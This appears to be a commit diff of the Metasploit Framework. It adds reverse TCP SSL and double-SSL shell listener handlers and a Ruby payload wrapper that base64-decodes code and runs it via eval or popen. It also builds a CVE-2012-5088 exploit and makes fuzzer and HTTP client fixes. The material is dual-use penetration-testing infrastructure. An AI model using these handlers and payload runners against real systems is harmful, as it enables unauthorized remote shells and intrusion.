external/source/exploits/cve-2012-5088/Makefile vendored Executable file
View File

@ -0,0 +1,16 @@
CLASSES = \
Exploit.java \
B.java
.SUFFIXES: .java .class
.java.class:
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2012-5088/
mv B.class ../../../../data/exploits/cve-2012-5088/
clean:
rm -rf *.class

3
external/source/gui/msfguijava/src/msfgui/RpcConnection.java vendored
View File

@ -260,7 +260,8 @@ public abstract class RpcConnection {
// Don't fork cause we'll check if it dies
String rpcType = "Basic";
java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"}));
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1",
"-p",Integer.toString(defaultPort)}));
if(!defaultSsl)
args.add("-S");
if(disableDb)

3
lib/msf/core/auxiliary/login.rb
View File

@ -50,7 +50,8 @@ module Auxiliary::Login
\n\*$ |
(Login ?|User ?)(name|): |
^\s*\<[a-f0-9]+\>\s*$ |
^\s*220.*FTP
^\s*220.*FTP|
not\ allowed\ to\ log\ in
)/mix
@waiting_regex = /(?:

4
lib/msf/core/auxiliary/web.rb
View File

@ -250,7 +250,9 @@ module Auxiliary::Web
if !(payload = opts[:payload])
if payloads
payload = payloads.select{ |p| element.altered_value.include?( p ) }.first
payload = payloads.select { |p|
element.altered_value.include?( p )
}.sort_by { |p| p.size }.last
end
end

5
lib/msf/core/auxiliary/web/analysis/differential.rb
View File

@ -101,7 +101,7 @@ module Analysis::Differential
# save the response and some data for analysis
responses[:good][elem.altered] << {
'res' => res,
'elem' => elem
'elem' => elem.dup
}
end
end
@ -122,8 +122,7 @@ module Analysis::Differential
http.if_not_custom_404( action, res['res'].body ) do
# if this isn't a custom 404 page then it means that
# the element is vulnerable, so go ahead and log the issue
fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.',
:payload => res['elem'].altered_value )
fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )
end
end
end

3
lib/msf/core/auxiliary/web/analysis/timing.rb
View File

@ -54,7 +54,8 @@ module Analysis::Timing
timeout = opts[:delay]
seed = p.altered_value.dup
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.
sort_by { |p2| p2.size }.last
# 1st pass, make sure the webapp is responsive
if_responsive do

31
lib/msf/core/auxiliary/web/http.rb
View File

@ -120,10 +120,15 @@ class Auxiliary::Web::HTTP
tl = []
loop do
# Spawn threads for each host
while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop)
tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request|
request.handle_response request( request.url, request.opts )
# Keep callback failures isolated.
begin
request.handle_response request( request.url, request.opts )
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
end
end
end
@ -261,10 +266,12 @@ class Auxiliary::Web::HTTP
end
def _request( url, opts = {} )
body = opts[:body]
body = opts[:body]
timeout = opts[:timeout] || 10
method = opts[:method].to_s.upcase || 'GET'
url = url.is_a?( URI ) ? url : URI( url.to_s )
method = opts[:method].to_s.upcase || 'GET'
url = url.is_a?( URI ) ? url : URI( url.to_s )
rex_overrides = opts.delete( :rex ) || {}
param_opts = {}
@ -280,10 +287,11 @@ class Auxiliary::Web::HTTP
end
opts = @request_opts.merge( param_opts ).merge(
'uri' => url.path || '/',
'method' => method,
'uri' => url.path || '/',
'method' => method,
'headers' => headers.merge( opts[:headers] || {} )
)
# Allow for direct rex overrides
).merge( rex_overrides )
opts['data'] = body if body
@ -291,7 +299,12 @@ class Auxiliary::Web::HTTP
Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout )
rescue ::Timeout::Error
Response.timed_out
rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
# This is bad but we can't anticipate the gazilion different types of network
# i/o errors between Rex and Errno.
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
Response.empty
end

2
lib/msf/core/auxiliary/wmapmodule.rb
View File

@ -71,7 +71,7 @@ module Auxiliary::WmapModule
else
res << datastore['VHOST']
end
res << ":" + wmap_target_port
res << ":" + wmap_target_port.to_s
res
end

12
lib/msf/core/db.rb
View File

@ -679,8 +679,8 @@ class DBManager
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session and session.via_exploit == "exploit/multi/handler"
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.new(sess_data)
@ -696,9 +696,9 @@ class DBManager
mod = framework.modules.create(session.via_exploit)
if session.via_exploit == "exploit/multi/handler"
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
else
mod_name = mod.name
mod_fullname = mod.fullname
@ -720,7 +720,7 @@ class DBManager
vuln = framework.db.report_vuln(vuln_info)
if session.via_exploit == "exploit/multi/handler"
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
via_exploit = sess_data[:datastore]['ParentModule']
else
via_exploit = session.via_exploit

4
lib/msf/core/exploit/file_dropper.rb
View File

@ -22,7 +22,9 @@ module Exploit::FileDropper
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
# read-only flag with a command.
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
if session.platform =~ /win/
session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
end
session.fs.file.rm(file)
print_good("Deleted #{file}")
true

30
lib/msf/core/exploit/ftpserver.rb
View File

@ -26,11 +26,13 @@ module Exploit::Remote::FtpServer
], Msf::Exploit::Remote::FtpServer)
end
# (see Msf::Exploit#setup)
def setup
super
@state = {}
end
# (see TcpServer#on_client_connect)
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
@ -46,6 +48,25 @@ module Exploit::Remote::FtpServer
c.put "220 FTP Server Ready\r\n"
end
# Dispatches client requests to command handlers.
#
# Handlers should be named +on_client_command_*+, ending with a
# downcased FTP verb, e.g. +on_client_command_user+. If no handler
# exists for the given command, returns a generic default response.
#
# @example Handle SYST requests
# class Metasploit4 < Msf::Exploit
# include Msf::Exploit::Remote::FtpServer
# ...
# def on_client_command_syst(cmd_conn, arg)
# print_status("Responding to SYST request")
# buf = build_exploit_buffer(cmd_conn)
# cmd_conn.put("215 Unix Type: #{buf}\r\n")
# end
# end
#
# @param (see TcpServer#on_client_data)
# @return (see TcpServer#on_client_data)
def on_client_data(c)
data = c.get_once
return if not data
@ -184,6 +205,15 @@ module Exploit::Remote::FtpServer
end
# Create a socket for the protocol data, either PASV or PORT,
# depending on the client.
#
# @see http://tools.ietf.org/html/rfc3659 RFC 3659
# @see http://tools.ietf.org/html/rfc959 RFC 959
# @param c [Socket] Control connection socket
#
# @return [Socket] A connected socket for the data connection
# @return [nil] on failure
def establish_data_connection(c)
begin
Timeout.timeout(20) do

21
lib/msf/core/exploit/http/client.rb
View File

@ -536,20 +536,21 @@ module Exploit::Remote::HttpClient
end
#
# Make sure the URI starts with a slash and doesn't end with one
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(str)
def normalize_uri(*strs)
new_str = strs * "/"
unless str.to_s[0,1] == "/"
str = "/" + str.to_s
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
str = str.gsub(/^\/+/, '/')
unless str.length == 1
str = str.gsub(/\/+$/, '')
end
str
new_str
end
#

19
lib/msf/core/exploit/web.rb
View File

@ -28,7 +28,7 @@ module Exploit::Remote::Web
super
register_options([
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
@ -75,14 +75,21 @@ module Exploit::Remote::Web
def exploit
print_status "Sending HTTP request for #{path}"
if res = perform_request
print_status "The server responded with HTTP status code #{res.code}."
else
print_status 'The server did not respond to our request.'
end
res = perform_request
if res
print_status "The server responded with HTTP status code #{res.code}."
else
print_status 'The server did not respond to our request.'
end
handler
end
def tries
1
end
private
def perform_request
send_request_cgi({
'global' => true,

300
lib/msf/core/handler/reverse_tcp_double_ssl.rb Normal file
View File

@ -0,0 +1,300 @@
# -*- coding: binary -*-
module Msf
module Handler
###
#
# This module implements the reverse double TCP handler. This means
# that it listens on a port waiting for a two connections, one connection
# is treated as stdin, the other as stdout.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpDoubleSSL
include Msf::Handler
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_double'.
#
def self.handler_type
return "reverse_tcp_double_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP handler and ads the options that are required
# for all reverse TCP payloads, like local host and local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LHOST,
Opt::LPORT(4444)
], Msf::Handler::ReverseTcpDoubleSSL)
register_advanced_options(
[
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
], Msf::Handler::ReverseTcpDoubleSSL)
self.conn_threads = []
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
end
self.listener_sock = Rex::Socket::TcpServer.create(
# 'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSL' => true,
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
end
#
# Closes the listener socket if one was created.
#
def cleanup_handler
stop_handler
# Kill any remaining handle_connection threads that might
# be hanging around
conn_threads.each { |thr|
thr.kill
}
end
#
# Starts monitoring for an inbound connection.
#
def start_handler
self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) {
sock_inp = nil
sock_out = nil
print_status("Started reverse double handler")
begin
# Accept two client connection
begin
client_a = self.listener_sock.accept
print_status("Accepted the first client connection...")
client_b = self.listener_sock.accept
print_status("Accepted the second client connection...")
sock_inp, sock_out = detect_input_output(client_a, client_b)
rescue
wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
return nil
end
# Increment the has connection counter
self.pending_connections += 1
# Start a new thread and pass the client connection
# as the input and output pipe. Client's are expected
# to implement the Stream interface.
conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
begin
chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
handle_connection(chan.lsock)
rescue
elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
end
}
end while true
}
end
#
# Accept two sockets and determine which one is the input and which
# is the output. This method assumes that these sockets pipe to a
# remote shell, it should overridden if this is not the case.
#
def detect_input_output(sock_a, sock_b)
begin
# Flush any pending socket data
sock_a.get_once if sock_a.has_read_data?(0.25)
sock_b.get_once if sock_b.has_read_data?(0.25)
etag = Rex::Text.rand_text_alphanumeric(16)
echo = "echo #{etag};\n"
print_status("Command: #{echo.strip}")
print_status("Writing to socket A")
sock_a.put(echo)
print_status("Writing to socket B")
sock_b.put(echo)
print_status("Reading from sockets...")
resp_a = ''
resp_b = ''
if (sock_a.has_read_data?(1))
print_status("Reading from socket A")
resp_a = sock_a.get_once
print_status("A: #{resp_a.inspect}")
end
if (sock_b.has_read_data?(1))
print_status("Reading from socket B")
resp_b = sock_b.get_once
print_status("B: #{resp_b.inspect}")
end
print_status("Matching...")
if (resp_b.match(etag))
print_status("A is input...")
return sock_a, sock_b
else
print_status("B is input...")
return sock_b, sock_a
end
rescue ::Exception
print_status("Caught exception in detect_input_output: #{$!}")
end
end
#
# Stops monitoring for an inbound connection.
#
def stop_handler
# Terminate the listener thread
if (self.listener_thread and self.listener_thread.alive? == true)
self.listener_thread.kill
self.listener_thread = nil
end
if (self.listener_sock)
self.listener_sock.close
self.listener_sock = nil
end
end
protected
attr_accessor :listener_sock # :nodoc:
attr_accessor :listener_thread # :nodoc:
attr_accessor :conn_threads # :nodoc:
module TcpReverseDoubleSSLChannelExt
attr_accessor :localinfo
attr_accessor :peerinfo
end
###
#
# This class wrappers the communication channel built over the two inbound
# connections, allowing input and output to be split across both.
#
###
class TcpReverseDoubleSSLSessionChannel
include Rex::IO::StreamAbstraction
def initialize(framework, inp, out)
@framework = framework
@sock_inp = inp
@sock_out = out
initialize_abstraction
self.lsock.extend(TcpReverseDoubleSSLChannelExt)
self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":")
self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":")
monitor_shell_stdout
end
#
# Funnel data from the shell's stdout to +rsock+
#
# +StreamAbstraction#monitor_rsock+ will deal with getting data from
# the client (user input). From there, it calls our write() below,
# funneling the data to the shell's stdin on the other side.
#
def monitor_shell_stdout
# Start a thread to pipe data between stdin/stdout and the two sockets
@monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) {
begin
while true
# Handle data from the server and write to the client
if (@sock_out.has_read_data?(0.50))
buf = @sock_out.get_once
break if buf.nil?
rsock.put(buf)
end
end
rescue ::Exception => e
ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}")
end
# Clean up the sockets...
begin
@sock_inp.close
@sock_out.close
rescue ::Exception
end
}
end
def write(buf, opts={})
@sock_inp.write(buf, opts)
end
def read(length=0, opts={})
@sock_out.read(length, opts)
end
#
# Closes the stream abstraction and kills the monitor thread.
#
def close
@monitor_thread.kill if (@monitor_thread)
@monitor_thread = nil
cleanup_abstraction
end
end
end
end
end

124
lib/msf/core/handler/reverse_tcp_ssl.rb Normal file
View File

@ -0,0 +1,124 @@
require 'rex/socket'
require 'thread'
require 'msf/core/handler/reverse_tcp'
module Msf
module Handler
###
#
# This module implements the reverse TCP handler. This means
# that it listens on a port waiting for a connection until
# either one is established or it is told to abort.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpSsl
include Msf::Handler::ReverseTcp
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_ssl'.
#
def self.handler_type
return "reverse_tcp_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP SSL handler and adds the certificate option.
#
def initialize(info = {})
super
register_advanced_options(
[
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
], Msf::Handler::ReverseTcpSsl)
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
comm.extend(Rex::Socket::SslTcp)
self.listener_sock = Rex::Socket::SslTcpServer.create(
'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSLCert' => datastore['SSLCert'],
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
ex = false
comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
comm_used = Rex::Socket::Comm::Local if comm_used == nil
if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
via = "via the #{comm_used.type} on session #{comm_used.sid}"
else
via = ""
end
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
end
}
raise ex if (ex)
end
end
end
end

16
lib/msf/core/module/platform.rb
View File

@ -479,4 +479,20 @@ class Msf::Module::Platform
Rank = 100
Alias = "php"
end
#
# JavaScript
#
class JavaScript < Msf::Module::Platform
Rank = 100
Alias = "js"
end
#
# Python
#
class Python < Msf::Module::Platform
Rank = 100
Alias = "python"
end
end

23
lib/msf/core/payload/java.rb
View File

@ -35,15 +35,14 @@ module Msf::Payload::Java
end
#
# Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define
# a list of class files in @class_files which are pulled from
# Msf::Config.data_directory. The configuration file is created by the
# payload's #config method.
#
# +opts+ can include:
# +:main_class+:: the name of the Main-Class attribute in the manifest.
# Defaults to "metasploit.Payload"
# Used by stagers to create a jar file as a {Rex::Zip::Jar}. Stagers
# define a list of class files in @class_files which are pulled from
# {Msf::Config.data_directory}. The configuration file is created by
# the payload's #config method.
#
# @option opts :main_class [String] the name of the Main-Class
# attribute in the manifest. Defaults to "metasploit.Payload"
# @return [Rex::Zip::Jar]
def generate_jar(opts={})
raise if not respond_to? :config
# Allow changing the jar's Main Class in the manifest so wrappers
@ -63,12 +62,12 @@ module Msf::Payload::Java
end
#
# Like #generate_jar, this method is used by stagers to create a war file
# Like {#generate_jar}, this method is used by stagers to create a war file
# as a Rex::Zip::Jar object.
#
# +opts+ can include:
# +:app_name+:: the name of the \<servlet-name> attribute in the web.xml.
# Defaults to "NAME"
# @param opts [Hash]
# @option :app_name [String] Name of the \<servlet-name> attribute in the
# web.xml. Defaults to random
#
def generate_war(opts={})
raise if not respond_to? :config

39
lib/msf/core/payload/ruby.rb Normal file
View File

@ -0,0 +1,39 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Ruby
def initialize(info = {})
super(info)
register_advanced_options(
[
# Since space restrictions aren't really a problem, default this to
# true.
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
]
)
end
def prepends(buf)
if datastore['PrependFork']
buf = %Q^
code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen(%(ruby), %(wb)) rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
end
buf
end
end

6
lib/msf/core/post/file.rb
View File

@ -274,7 +274,7 @@ module Msf::Post::File
end
#
# Read a local file +local+ and write it as +remote+ on the remote file
# Read a local file +local+ and write it as +remote+ on the remote file
# system
#
def upload_file(remote, local)
@ -304,7 +304,7 @@ module Msf::Post::File
#
def rename_file(new_file, old_file)
#TODO: this is not ideal as the file contents are sent to meterp server and back to the client
write_file(new_file, read_file(old_file))
write_file(new_file, read_file(old_file))
rm_f(old_file)
end
alias :move_file :rename_file
@ -315,7 +315,7 @@ protected
# Meterpreter-specific file read. Returns contents of remote file
# +file_name+ as a String or nil if there was an error
#
# You should never call this method directly. Instead, call #read_file
# You should never call this method directly. Instead, call {#read_file}
# which will call this if it is appropriate for the given session.
#
def _read_file_meterpreter(file_name)

321
lib/msf/ui/banner.rb
View File

@ -10,301 +10,52 @@ module Ui
module Banner
Logos =
[
%Q{
%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
%bldthe matrix has you%clr
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \\
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
%clr},
%Q{%whi
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \\
;@'. __*__,." \\|--- \\_____________/
'(.,...."/
%clr},
'
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
',
'
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\
',
%Q{
%whiIIIIII %reddTb.dTb%clr _.---._
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
%whi II %red6. .P%clr : .' / | \ `. :
%whi II %red'T;. .;P'%clr '.' / | \ `.'
%whi II %red'T; ;P'%clr `. / | \ .'
%whiIIIIII %red'YvP'%clr `-.__|__.-'
I love shells --egypt
},
'
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
',
'
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
',
'%clr
______________________________________________________________________________
| |
| %bld3Kom SuperHack II Logon%clr |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ %redsecurity%clr ] |
| |
| Password: [ ] |
| |
| |
| |
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|
%clr
',
'%clr
______________________________________________________________________________
| |
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|______________________________________________________________________________|
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr . %yel/%clr %yel/%clr x
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr %yel/%clr + %yel/%clr
%yel\%clr + %yel/%clr %yel/%clr
* %yel/%clr %yel/%clr
%yel/%clr . %yel/%clr
X %yel/%clr %yel/%clr X
%yel/%clr %red###%clr
%yel/%clr %red# %bld%%clr%red #%clr
%yel/%clr %red###%clr
. %yel/%clr
. %yel/%clr . %red*%clr .
%yel/%clr
*
+ %red*%clr
%bld^%clr
#### __ __ __ ####### __ __ __ ####
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
################################################################################
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
%clr
',
'
%clr%whi
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
%bld
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
%clr
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
Aiee, Killing Interrupt handler
%redKernel panic: Attempted to kill the idle task!
In swapper task - not syncing
%clr
',
'
%clr
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
%bluMMMMMMMMMMM MMMMMMMMMM%clr
%bluMMMN$ vMMMM%clr
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr
',
'
%clr ######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
%red##%clr %red###%clr #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
%clr
',
%Q{
%whi+-------------------------------------------------------+
%whi| METASPLOIT by Rapid7 |
%whi+---------------------------+---------------------------+
%whi| %blu__________________ %whi| |
%whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi|
%whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi|
%whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi|
